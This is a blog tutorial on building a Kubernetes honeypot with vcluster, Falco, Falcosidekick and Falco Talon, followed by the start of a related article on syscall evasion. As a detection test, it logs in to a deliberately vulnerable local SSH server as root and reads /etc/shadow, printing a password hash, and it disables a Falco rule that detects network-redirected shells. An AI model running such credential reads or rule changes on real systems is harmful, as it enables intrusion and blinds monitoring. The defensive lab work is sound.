Building Honeypots with vcluster and Falco: Episode II

This is part two in our series on building honeypots with Falco, vcluster, and other assorted open source tools. For the previous installment, see Building honeypots with vcluster and Falco: Episode I.

When Last We Left our Heroes

In the previous article, we discussed high-interaction honeypots and used vcluster to build an intentionally vulnerable SSH server inside of its own cluster so it couldn’t hurt anything else in the environment when it got owned. Then, we installed Falco on the host and proceeded to attack the SSH server, watching the Falco logs to see the appropriate rule trigger when we read /etc/shadow.

This is all great, but it’s just a start. This time around, we’ll be adding additional functionality to our honeypot so we can react to what is happening inside it. Some of these additional pieces will also be laying down the infrastructure for adding additional functionality down the road. 

We’ll be going beyond the basics, and this is where things start to get fun.

Our Shortcomings

The setup from the previous article had two major shortcomings. There are a few more, but we’ll get to those later.

First, the previous iteration of our honeypot required being run directly on an OS sitting on an actual hunk of hardware. This is of limited utility as it really doesn’t scale well unless we want to set up an army of hardware to support our eventual sprawl of honeypot bits. At the time, this was the only way we could do this with Minikube and Falco, as the Falco of yore didn’t have the kernel modules we needed to do otherwise. Fortunately, this is no longer the case. We can now take a more cloud-native approach and build this on an EC2 instance in AWS, and everything will be satisfactory. To the cloud!

NOTE: We’re going to be building a honeypot which is, by definition, an intentionally vulnerable system. We won’t have much in the way of monitoring built out just yet, so we don’t suggest that you expose it to the internet.

Second, the old honeypot didn’t do much other than complain into the Falco logs when we went poking around in the pod’s sensitive files. This, we can also fix. We’re going to be using Falcosidekick and Falco Talon to make our honeypot actually do something when we go tripping Falco rules.

Response Engines

Response engine is a term often used in the context of EDR (Endpoint Detection and Response), SIEM (Security Information and Event Management), SOAR (Security Orchestration, Automation and Response), and XDR (Extended Detection and Response). See EDR vs. XDR vs. SIEM vs. MDR vs. SOAR for more information. 

It’s a component that executes an automated response to security threats. This is exactly the tool we need in this case. 

When we trip one of the Falco rules by interacting with our honeypot, we need to take automatic action. In our particular case, we’re going to be shutting down the pod that the attackers have owned so we can spin a clean one back up in its place. We’ll be using a tool called Falco Talon for this. We’re also going to include another tool, Falcosidekick, that will allow us some additional flexibility down the road to do other things in response to the events that happen in our environment. 

Falcosidekick

Falcosidekick is a great tool that enables us to connect Falco up to many other interesting bits and pieces. We can use it to perform monitoring and alerting, ship logs off to different tools, and all sorts of other things. This is the glue piece that we will use to send the events to Falco Talon. 
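
The only Sidekick plumbing we need for this build is its webhook output, which is what will carry events over to Talon. The helm flag we’ll pass during the Falco install below populates it; as a rough sketch, the equivalent snippet of Falcosidekick’s own YAML configuration looks something like this:

webhook:
  address: "http://falco-talon:2803"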

Falco Talon

Falco Talon is the piece that will be performing the actual responses to the Falco rules that get tripped. Talon has its own internal set of rules that defines which Falco rules it should respond to and what it should do when they are triggered. 

Getting Our Hands Dirty

Let’s jump right in and build some things. 

This time around, we’ll be building our honeypot on an Ubuntu Server 22.04 t3.xlarge EC2 instance on AWS. You may be able to go with a smaller instance, but there is a point at which the instance won’t have sufficient resources for everything to spin up. Very small instances, such as the t2.micro, will almost certainly not have sufficient horsepower for everything to function properly. 

In theory, you should be able to build this on any of the similar cloud services and have it work, as long as you have all the proper application bits in place. 

As a prerequisite, you will need to have installed the following tools; recent versions of each should be fine:

  • Docker
  • Minikube
  • kubectl
  • Helm
  • sshpass

The rest we’ll install as we work through the process. 

Fire Up Minikube

1 – First we want to start up minikube using the docker driver. We’ll see it go through its paces and download a few dependencies.

21 – Next, we’ll enable the ingress addon for minikube. This will allow us to reach the SSH server that we’ll be installing shortly.

$ minikube start --vm-driver=docker

😄  minikube v1.32.0 on Ubuntu 22.04
✨  Using the docker driver based on user configuration
📌  Using Docker driver with root privileges
👍  Starting control plane node minikube in cluster minikube
🚜  Pulling base image ...
💾  Downloading Kubernetes v1.28.3 preload ...
    > preloaded-images-k8s-v18-v1...:  403.35 MiB / 403.35 MiB  100.00% 51.69 M
🔥  Creating docker container (CPUs=2, Memory=3900MB) ...
🐳  Preparing Kubernetes v1.28.3 on Docker 24.0.7 ...
    ▪ Generating certificates and keys ...
    ▪ Booting up control plane ...
    ▪ Configuring RBAC rules ...
🔗  Configuring bridge CNI (Container Networking Interface) ...
    ▪ Using image gcr.io/k8s-minikube/storage-provisioner:v5
🔎  Verifying Kubernetes components...
🌟  Enabled addons: storage-provisioner, default-storageclass
🏄  Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default

$ minikube addons enable ingress

💡  ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub.
You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS
    ▪ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0
    ▪ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0
    ▪ Using image registry.k8s.io/ingress-nginx/controller:v1.9.4
🔎  Verifying ingress addon...
🌟  The 'ingress' addon is enabled


Install Falco

1 – Next, we need to add the falcosecurity helm repo so we can access the helm chart for Falco.

4 – Once we have the repo added, we’ll update to get the latest chart.

11 – We’ll use kubectl to create a namespace for Falco to live in. We’ll also use this same namespace later for Sidekick and Talon.

14 – Now, we’ll kick off the Falco install. You’ll notice here we have a few additional arguments to disable buffering for the Falco logs so we get events more quickly, install Sidekick during the Falco install, enable the web UI, and set up the outgoing webhook for Sidekick to point at the URL where Talon will shortly be listening.

$ helm repo add falcosecurity https://falcosecurity.github.io/charts
"falcosecurity" has been added to your repositories

$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
...Successfully got an update from the "stable" chart repository
Update Complete. ⎈Happy Helming!⎈

$ kubectl create namespace falco
namespace/falco created

$ helm install falco falcosecurity/falco --namespace falco \
--set tty=true \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set falcosidekick.config.webhook.address="http://falco-talon:2803"
NAME: falco
LAST DEPLOYED: Wed Dec  0 19:38:38 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 1
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.


💡 Note: If you want to dig deeper into Falco, take a look at the course Falco 101.

Update the Falco Rules

Later on, we’ll be setting up a port forward for the SSH server so we can reach it. Falco is going to be vocal about this and it will trigger the “Redirect STDOUT/STDIN to Network Connection in Container” rule a LOT, which will make it difficult to see the rule we actually care about in the Falco logs, as well as send quite a lot of extra events to Talon. Let’s just disable that rule.

If you want to take a look at the rule we’re disabling, you can find it in the Falco rules repo here.

1 – We’re going to make a temporary file to hold our rule modification, into which we will insert a customRules section.

2 – Next, we’ll add the override.yaml.

3 – Then, the existing rule from the Falco rules file that we’re going to override.

4 – And, tell Falco that we want to disable it.

6 – Then, we’ll use helm to upgrade Falco and feed it the file we made, telling it to reuse the rest of the values it previously had.

21 – Lastly, we’ll kill off the existing Falco pods so we get new ones with the rule disabled in their rulesets.

echo "customRules:" > /tmp/customrules.yaml
echo "  override.yaml: |-" >> /tmp/customrules.yaml
echo "    - rule: Redirect STDOUT/STDIN to Network Connection in Container" >> /tmp/customrules.yaml
echo "      enabled: false" >> /tmp/customrules.yaml

$ helm upgrade falco falcosecurity/falco --namespace falco --values /tmp/customrules.yaml --reuse-values
Release "falco" has been upgraded. Happy Helming!
NAME: falco
LAST DEPLOYED: Wed Dec  0 23:56:23 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 2
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.

$ kubectl delete pods -n falco -l app.kubernetes.io/name=falco
pod "falco-94wsk" deleted


Install Falco Talon

Now let’s install Falco Talon.

1 – As it’s currently an alpha, Talon isn’t published in the standard helm repos. We’ll clone the Talon repo from GitHub to get a copy of the helm chart. 

12 – If we take a quick look at the Talon repo, we can see the helm chart for it, as well as a couple of YAML files that hold its configuration. We’ll be changing the rules.yaml in the next set of steps.

16 – Now, a quick helm install of Talon into the falco namespace alongside Falco and Sidekick.

git clone https://github.com/Issif/falco-talon.git /tmp/falco-talon

Cloning into '/tmp/falco-talon'...
remote: Enumerating objects: 1599, done.
remote: Counting objects: 100% (744/744), done.
remote: Compressing objects: 100% (349/349), done.
remote: Total 1599 (delta 473), reused 565 (delta 338), pack-reused 855
Receiving objects: 100% (1599/1599), 743.58 KiB | 2.81 MiB/s, done.
Resolving deltas: 100% (866/866), done.

 
$ ls /tmp/falco-talon/deployment/helm/
Chart.yaml  rules.yaml  templates  values.yaml


$ helm install falco-talon /tmp/falco-talon/deployment/helm --namespace falco

NAME: falco-talon
LAST DEPLOYED: Thu Dec  0 00:01:53 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 1
TEST SUITE: None

Update the Talon Rules and Configuration

As we discussed earlier, we need to set up the rules for Talon separately. Let’s take a quick peek at what we have in the rules.yaml now.

1 – Each rule in the file is designated with ‘- name’ and we have a few examples to look at.

21 – This is a rule along the lines of what we want to replicate, though we can drop the parameters section.

$ cat /tmp/falco-talon/deployment/helm/rules.yaml

- name: Rule Labelize
  match:
    rules:
      - Terminal shell in container
    output_fields:
      - k8s.ns.name!=kube-system
  action:
    name: kubernetes:labelize
    parameters:
      labels:
        suspicious: "true"
- name: Rule NetworkPolicy
  match:
    rules:
      - "Outbound Connection to C2 Servers"
  action:
    name: kubernetes:networkpolicy
  before: true
- name: Rule Terminate
  match:
    rules:
      - "Outbound Connection to C2 Servers"
  action:
    name: kubernetes:terminate
    parameters:
      ignoreDaemonsets: true
      ignoreStatefulsets: true


This will work very similarly to how we edited the Falco rules earlier.

1 – We’ll echo a series of lines into the /tmp/falco-talon/deployment/helm/rules.yaml file. We need to name the Talon rule (this is an arbitrary name), tell it which Falco rule we want to match against (this is the specific name of the Falco rule), and then tell it what action we want it to take on a match. In this case, we’ll be terminating the pod.

15 – We need to comment out one of the outputs in the values.yaml in the Talon chart directory while we’re in here, since we won’t be configuring a Slack alert. If we didn’t do this, it wouldn’t hurt anything, but we would see an error later in the Talon logs.

17 – Once again, we’ll do a helm upgrade and point at our updated files. Note that we aren’t using the --reuse-values argument to tell helm to keep the rest of the existing settings this time. If we did this, our changes to the values.yaml would not be included.

27 – Then, we need to kill the existing pods to refresh them.

$ echo -e '' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '- name: Sensitive file opened' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '  match:' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '    rules:' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '      - "Read sensitive file untrusted"' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '  action:' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '    name: kubernetes:terminate' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ sed -i 's/^\s*-\s*slack/ # - slack/' /tmp/falco-talon/deployment/helm/values.yaml

$ helm upgrade falco-talon /tmp/falco-talon/deployment/helm --namespace falco

Release "falco-talon" has been upgraded. Happy Helming!
NAME: falco-talon
LAST DEPLOYED: Thu Dec  0 00:10:28 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 2
TEST SUITE: None

$ kubectl delete pods -n falco -l app.kubernetes.io/name=falco-talon

pod "falco-talon-5bcf97655d-gvkv9" deleted
pod "falco-talon-5bcf97655d-wxr4g" deleted


Install vcluster

So that we can run our SSH server in isolation, we’ll download vcluster and set it up.

1 – Here, we’ll set an environment variable to fish out the latest vcluster version from the GitHub repository.

3 – Now, we’ll use that environment variable to construct the download URL.

5 – We’ll use curl to download the file and move it to /usr/local/bin.

11 – Now, let’s check the vcluster version to make sure we got everything installed properly. 

14 – We’ll finish up by creating a vcluster namespace for everything to live in.

$ LATEST_TAG=$(curl -s -L -o /dev/null -w %{url_effective} "https://github.com/loft-sh/vcluster/releases/latest" | rev | cut -d'/' -f1 | rev)

$ URL="https://github.com/loft-sh/vcluster/releases/download/${LATEST_TAG}/vcluster-linux-amd64"

$ curl -L -o vcluster "$URL" && chmod +x vcluster && sudo mv vcluster /usr/local/bin;
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 61.4M  100 61.4M    0     0  80.7M      0 --:--:-- --:--:-- --:--:--  194M

$ vcluster version
vcluster version 0.18.0

$ kubectl create namespace vcluster
namespace/vcluster created
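
As an aside, if you have jq installed, the GitHub releases API is a slightly less contorted way to fetch the same tag. A quick alternative sketch, assuming jq is available on the instance:

$ LATEST_TAG=$(curl -s https://api.github.com/repos/loft-sh/vcluster/releases/latest | jq -r .tag_name)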


Install the SSH Server in vcluster

Now that we have vcluster working, we can get our target SSH server installed.

1 – We’ll start off by creating a virtual cluster named ssh in the vcluster namespace. It’s also important to note that we have now switched contexts to the ssh cluster.

14 – Now, we’ll create a namespace called ssh inside our virtual cluster.

17 – We’ll add the securecodebox repo so we can get the chart for the SSH server.

20 – And, do a quick update to pull the latest chart.

27 – Here, we’ll use helm to install the intentionally vulnerable SSH server.

42 – Last, we’ll disconnect from the vcluster, which will switch our context back to minikube.

$ vcluster create ssh -n vcluster

05:36:45 info Detected local kubernetes cluster minikube. Will deploy vcluster with a NodePort & sync real nodes
05:36:45 info Create vcluster ssh...
05:36:45 info execute command: helm upgrade ssh /tmp/vcluster-0.18.0.tgz-1681152849 --kubeconfig /tmp/2282824298 --namespace vcluster --install --repository-config='' --values /tmp/654191707
05:36:46 done Successfully created virtual cluster ssh in namespace vcluster
05:36:46 info Waiting for vcluster to come up...
05:37:11 info Stopping docker proxy...
05:37:21 info Starting proxy container...
05:37:21 done Switched active kube context to vcluster_ssh_vcluster_minikube
- Use `vcluster disconnect` to return to your previous kube context
- Use `kubectl get namespaces` to access the vcluster

$ kubectl create namespace ssh
namespace/ssh created

$ helm repo add securecodebox https://charts.securecodebox.io/
"securecodebox" already exists with the same configuration, skipping

$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
...Successfully got an update from the "stable" chart repository
Update Complete. ⎈Happy Helming!⎈

$ helm install my-dummy-ssh securecodebox/dummy-ssh --version 3.4.0 --namespace ssh \
--set global.service.type="nodePort"

NAME: my-dummy-ssh
LAST DEPLOYED: Fri Dec  0 05:38:10 2023
NAMESPACE: ssh
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Demo SSH Server deployed.

Note this should used for demo and test purposes.
Do not expose this to the Internet!

$ vcluster disconnect

05:38:19 info Successfully disconnected from vcluster: ssh and switched back to the original context: minikube


Test Everything Out

Okay! Now we have everything built. Let’s give it a test.

You may recall the vcluster reference diagram from the previous article:

This will be helpful to keep in mind when visualizing the architecture as we work through this.

1 – Let’s take a quick look at the pods in the vcluster namespace. We can see our SSH server here called my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh. We’ll note that for future reference. 

10 – Here, we’ll set up a port forward to expose the SSH server. Note that the port forward relies on an $SSH_SERVICE variable holding the name of the synced SSH service; see the note just after this list for one way to set it.

18 – Now, we’ll kick off the rest of the events by using sshpass to SSH into the server and read the /etc/shadow file. Right now we’re doing this manually, so we don’t strictly need sshpass, but we’re going to be automating this later and we’ll need it then.

22 – Here, we can see the contents of the file.
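
Before running the commands below, $SSH_SERVICE needs to hold the name of the SSH service that vcluster synced into the vcluster namespace. A minimal sketch for grabbing it, assuming the synced service name contains my-dummy-ssh like the pod name above does:

$ SSH_SERVICE=$(kubectl get svc -n vcluster -o name | grep my-dummy-ssh | cut -d'/' -f2)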

$ kubectl get pods -n vcluster

NAME                                           READY   STATUS    RESTARTS   AGE
coredns-68bdd584b4-dwmms-x-kube-system-x-ssh   1/1     Running   0          4m43s
my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      1/1     Running   0          3m42s
ssh-0                                          1/1     Running   0          5m7s

$ sleep 30

$ kubectl port-forward svc/"$SSH_SERVICE" 5555:22 -n vcluster & 

[1] 1196783
$ Forwarding from 127.0.0.1:5555 -> 22
Forwarding from [::1]:5555 -> 22

$ sleep 10

$ sshpass -p "THEPASSWORDYOUCREATED" ssh -o StrictHostKeyChecking=no -p 5555 root@127.0.0.1 "cat /etc/shadow"

Handling connection for 5555
root:$6$hJ/W8Ww6$pLqyBWSsxaZcksn12xZqA1Iqjz.15XryeIEZIEsa0lbiOR9/3G.qtXl/SvfFFCTPkElo7VUD7TihuOyVxEt5j/:18281:0:99999:7:::
daemon:*:18275:0:99999:7:::
bin:*:18275:0:99999:7:::
sys:*:18275:0:99999:7:::
sync:*:18275:0:99999:7:::
games:*:18275:0:99999:7:::
man:*:18275:0:99999:7:::
lp:*:18275:0:99999:7:::
mail:*:18275:0:99999:7:::
news:*:18275:0:99999:7:::
uucp:*:18275:0:99999:7:::
proxy:*:18275:0:99999:7:::
www-data:*:18275:0:99999:7:::
backup:*:18275:0:99999:7:::
list:*:18275:0:99999:7:::
irc:*:18275:0:99999:7:::
gnats:*:18275:0:99999:7:::
nobody:*:18275:0:99999:7:::
systemd-timesync:*:18275:0:99999:7:::
systemd-network:*:18275:0:99999:7:::
systemd-resolve:*:18275:0:99999:7:::
systemd-bus-proxy:*:18275:0:99999:7:::
_apt:*:18275:0:99999:7:::
sshd:*:18281:0:99999:7:::

Checking the Logs

Let’s see what all happened as a result of our attack against the SSH server.

1 – We’ll set an environment variable up to find the Falco pod for us and hold its location.

3 – Now, let’s have a look at those logs. The bits at the beginning are from Falco spinning up. Incidentally, we can see the override file that we created earlier loading here.

18 – This is the meaty bit. In the output, we can see “Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow),” which is exactly what we did when we poked at the SSH server.

22 – Now, let’s look at the Talon logs. Here, we’ll put a one-liner together that will find the Talon pods and fetch the logs for us. Note that there are two Talon pods and what we want could be in either of them, so we’ll grab the logs from both. You can see that the output is interleaved from both of them.

30 – Here, we can see the Falco event coming through to Talon. 

32 – And here we got a match against the Talon rule we created earlier. 

33 – Here is the action from the Talon rule being executed.

$ FALCO_POD=$(kubectl get pods -n falco -l app.kubernetes.io/name=falco -o=jsonpath='{.items[*].metadata.name}')

$ kubectl logs "$FALCO_POD" -n falco

Defaulted container "falco" out of: falco, falcoctl-artifact-follow, falco-driver-loader (init), falcoctl-artifact-install (init)
Fri Dec  0 05:33:49 2023: Falco version: 0.36.2 (x86_64)
Fri Dec  0 05:33:49 2023: Falco initialized with configuration file: /etc/falco/falco.yaml
Fri Dec  0 05:33:49 2023: Loading rules from file /etc/falco/falco_rules.yaml
Fri Dec  0 05:33:49 2023: Loading rules from file /etc/falco/rules.d/override.yaml
Fri Dec  0 05:33:49 2023: The chosen syscall buffer dimension is: 8388608 bytes (8 MBs)
Fri Dec  0 05:33:49 2023: Starting health webserver with threadiness 4, listening on port 8765
Fri Dec  0 05:33:49 2023: Loaded event sources: syscall
Fri Dec  0 05:33:49 2023: Enabled event sources: syscall
Fri Dec  0 05:33:49 2023: Opening 'syscall' source with Kernel module

<snip>

{"hostname":"falco-wchsq","output":"18:39:24.133546875: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=0f044393375b container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh_vcluster_e10eeedf-7ad2-4a7e-8b73-b7713d6537da_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh)","priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2023-12-08T18:39:24.133546875Z", "output_fields": {"container.id":"0f044393375b","container.image.repository":"securecodebox/dummy-ssh","container.image.tag":"v1.0.0","container.name":"k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh_vcluster_e10eeedf-7ad2-4a7e-8b73-b7713d6537da_0","evt.arg.flags":"O_RDONLY","evt.time":43012267506,"evt.type":"open","fd.name":"/etc/shadow","k8s.ns.name":"vcluster","k8s.pod.name":"my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh","proc.aname[2]":"sshd","proc.aname[3]":"containerd-shim","proc.aname[4]":null,"proc.cmdline":"cat /etc/shadow","proc.exepath":"/bin/cat","proc.name":"cat","proc.pname":"sshd","proc.tty":0,"user.loginuid":0,"user.name":"root","user.uid":0}}

<snip>

$ kubectl get pods -n falco -l app.kubernetes.io/name=falco-talon -o=jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}' | xargs -I {} kubectl logs {} -n falco

2023-12-00T05:33:41Z INF init action_category=kubernetes
2023-12-00T05:33:41Z INF init notifier=k8sevents
2023-12-00T05:33:41Z INF init notifier=slack
2023-12-00T05:33:41Z INF init result="4 rules have been successfully loaded"
2023-12-00T05:33:41Z INF init result="watch of rules enabled"
2023-12-00T05:33:41Z INF init result="Falco Talon is up and listening on 0.0.0.0:2803"
2023-12-00T05:44:46Z INF event output="05:44:46.118305822: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=1536aa9c45c2 container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh_vcluster_21bdc319-5566-41ee-8a64-d8b7628e5937_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh)" priority=Warning rule="Read sensitive file untrusted" source=syscall 
trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF match action=kubernetes:terminate rule="Sensitive file opened" trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF action Namespace=vcluster Pod=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh action=kubernetes:terminate event="05:44:46.118305822: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=1536aa9c45c2 container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh_vcluster_21bdc319-5566-41ee-8a64-d8b7628e5937_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh)" rule="Sensitive file opened" status=success trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF notification action=kubernetes:terminate notifier=k8sevents rule="Sensitive file opened" status=success trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:33:41Z INF init action_category=kubernetes
2023-12-00T05:33:41Z INF init notifier=k8sevents
2023-12-00T05:33:41Z INF init notifier=slack
2023-12-00T05:33:41Z INF init result="4 rules have been successfully loaded"
2023-12-00T05:33:41Z INF init result="watch of rules enabled"
2023-12-00T05:33:41Z INF init result="Falco Talon is up and listening on 0.0.0.0:2803

Now, let’s go take a peek at the cluster and see what happened as a result of our efforts. As we noted earlier, the name of the SSH server pod was my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh.

1 – Let’s get the pods again from the vcluster namespace. Now, we can see the name of the SSH server pod is my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh. Success!

8 – We’ll take a look at the events in the vcluster namespace and grep for my-dummy-ssh to find the bits we care about.

14 – Here, we can see the new SSH server pod my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh being started up.

20 – We can see the owned pod my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh being killed off. 

$ kubectl get pods -n vcluster

NAME                                           READY   STATUS    RESTARTS   AGE
coredns-68bdd584b4-dwmms-x-kube-system-x-ssh   1/1     Running   0          9m11s
my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      1/1     Running   0          95s
ssh-0                                          1/1     Running   0          9m35s

$ kubectl get events -n vcluster | grep my-dummy-ssh

113s        Normal    falco-talon:kubernetes:terminate:success   pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Status: success...
113s        Normal    Scheduled                                  pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Successfully assigned vcluster/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh to minikube
112s        Normal    Pulled                                     pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Container image "docker.io/securecodebox/dummy-ssh:v1.0.0" already present on machine
112s        Normal    Created                                    pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Created container dummy-ssh
112s        Normal    Started                                    pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Started container dummy-ssh
8m28s       Normal    Scheduled                                  pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Successfully assigned vcluster/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh to minikube
8m27s       Normal    Pulling                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Pulling image "docker.io/securecodebox/dummy-ssh:v1.0.0"
8m18s       Normal    Pulled                                     pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Successfully pulled image "docker.io/securecodebox/dummy-ssh:v1.0.0" in 9.611s (9.611s including waiting)
8m17s       Normal    Created                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Created container dummy-ssh
8m16s       Normal    Started                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Started container dummy-ssh
113s        Normal    Killing                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Stopping container dummy-ssh

And there we have it, end to end. Here’s what we did:

  • Attacked the SSH server pod
  • Tripped the ‘Sensitive file opened for reading by non-trusted program’ rule in Falco
  • Used a webhook from Falcosidekick to Falco Talon to ship the events over
  • Tripped the ‘Sensitive file opened’ rule in Falco Talon
  • Terminated the offending pod

And Now With Slightly More Automation

All of that above was quite a few moving parts. Wouldn’t it be nice if we could just run a script to do all of this? Yes, yes it would. Fortunately, we can do just that.

In the Sysdig TRT GitHub repo, pull down the minhoney.sh file. You’ll want to set it executable. To fire up the honeypot, simply run the script with the --buildit argument:

$ ./minhoney.sh --buildit

To take everything back down again, run the script again with the --burnit argument.

$ ./minhoney.sh --burnit
NOTE: When run with --burnit, the script will attempt to do some cleanup of things that may cause problems with future runs. It will uninstall anything in helm, kill off everything in minikube, and delete everything out of /tmp that the current user has permissions to delete. It is NOT recommended that you run this on anything other than a system or instance built for this specific purpose. Don’t say we didn’t warn you, cause we totally warned you.

That’s All (for Now) Folks

If we take a step back and look at everything we just walked through, there we have it again, end to end:

  • Attacked the SSH server pod
  • Tripped the ‘Sensitive file opened for reading by non-trusted program’ rule in Falco
  • Used a webhook from Falcosidekick to Falco Talon to send the events
  • Matched the ‘Sensitive file opened’ rule in Falco Talon
  • Terminated the offending pod

In the next part of this series, we’ll add several additional pieces to this. Logging and alerting would be nice, as well as additional automation to set everything up. We’ll also scale this up with some additional targets to attack.

For the previous episode with the basics, see Building honeypots with vcluster and Falco: Episode I.

Exploring Syscall Evasion – Linux Shell Built-ins
This is the first article in a series focusing on syscall evasion as a means to work around detection by security tools and what we can do to combat such efforts. We’ll be starting out the series discussing how this applies to Linux operating systems, but this is a technique that applies to Windows as well, and we’ll touch on some of this later on in the series. 

In this particular installment, we’ll be discussing syscall evasion with bash shell builtins. If you read that and thought “what evasion with bash what now?”, that’s ok. We’ll walk through it from the beginning. 

What is a Syscall?

System calls, commonly referred to as syscalls, are the interface between user-space applications and the kernel, which, in turn, talks to the rest of our resources, including files, networks, and hardware. Basically, we can consider syscalls to be the gatekeepers of the kernel when we’re looking at things from a security perspective.

Many security tools (Falco included) that watch for malicious activity taking place are monitoring syscalls going by. This seems like a reasonable approach, right? If syscalls are the gatekeepers of the kernel and we watch the syscalls with our security tool, we should be able to see all of the activity taking place on the system. We’ll just watch for the bad guys doing bad things with bad syscalls and then we’ll catch them, right? Sadly, no.

There is a dizzying array of syscalls, some of which have overlapping sets of functionality. For instance, if we want to open a file, there is a syscall called open() and we can look at the documentation for it here. So if we have a security tool that can watch syscalls going by, we can just watch for the open() syscall and we should be all good for monitoring applications trying to open files, right? Well, sort of.

If we look at the synopsis in the open() documentation:

[Image: the SYNOPSIS section of the open(2) man page, listing open(), creat(), openat(), and openat2()]

As it turns out, there are several syscalls that we could be using to open our file: open(), creat(), openat(), and openat2(), each of which have a somewhat different set of behaviors. For example, the main difference between open() and openat() is that the path for the file being opened by openat() is considered to be relative to the current working directory, unless an absolute path is specified. Depending on the operating system being used, the application in question, and what it is doing relative to the file, we may see different variations of the open syscalls taking place. If we’re only watching open(), we may not see the activity that we’re looking for at all.
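
We can watch this in action by asking strace (which we’ll cover properly in a moment) to trace only the open-family syscalls. On most modern glibc-based systems, even a simple file read goes through openat() rather than open(). A quick sketch, assuming your strace is recent enough to know about openat2():

# Show only the open-family syscalls made while cat reads a file
$ strace -e trace=open,openat,openat2,creat cat /etc/hostname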

